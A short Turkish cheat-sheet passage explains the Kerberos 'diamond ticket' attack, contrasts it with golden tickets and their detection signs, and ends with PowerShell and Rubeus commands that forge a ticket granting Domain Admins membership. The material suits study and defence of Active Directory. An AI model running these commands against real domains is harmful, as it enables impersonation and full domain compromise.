Elmas Bilet

Bir altın bileti gibi, elmas bir bilettir ve herhangi bir kullanıcı olarak herhangi bir hizmete erişmek için kullanılabilir. Altın bir bilet tamamen çevrimdışı olarak sahte bir şekilde oluşturulur, o alanın krbtgt karma değeriyle şifrelenir ve ardından kullanım için bir oturum açma oturumuna geçirilir. Alan denetleyicileri, yasal olarak verdiği TGT'leri izlemediği için, kendi krbtgt karma değeriyle şifrelenmiş TGT'leri memnuniyetle kabul eder.

Altın biletlerin kullanımını tespit etmek için iki yaygın teknik vardır:

• Karşılık gelen bir AS-REQ olmayan TGS-REQ'leri arayın.

• Mimikatz'ın varsayılan 10 yıllık ömrü gibi saçma değerlere sahip TGT'leri arayın.

Bir elmas bilet, bir DC tarafından verilen yasal bir TGT'nin alanlarını değiştirerek oluşturulur. Bunun için bir TGT talep edilir, alanın krbtgt karma değeriyle şifrelenir, biletin istenen alanları değiştirilir ve ardından tekrar şifrelenir. Bu, bir altın bileti'nin yukarıda bahsedilen iki kusurunu aşar çünkü:

• TGS-REQ'lerin bir önceki AS-REQ'i olacaktır.

• TGT, bir DC tarafından verildiği için, alanın Kerberos politikasından tüm doğru ayrıntılara sahip olacaktır. Bir altın bilete doğru şekilde sahte yapılabilir, ancak daha karmaşık ve hatalara açıktır.

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.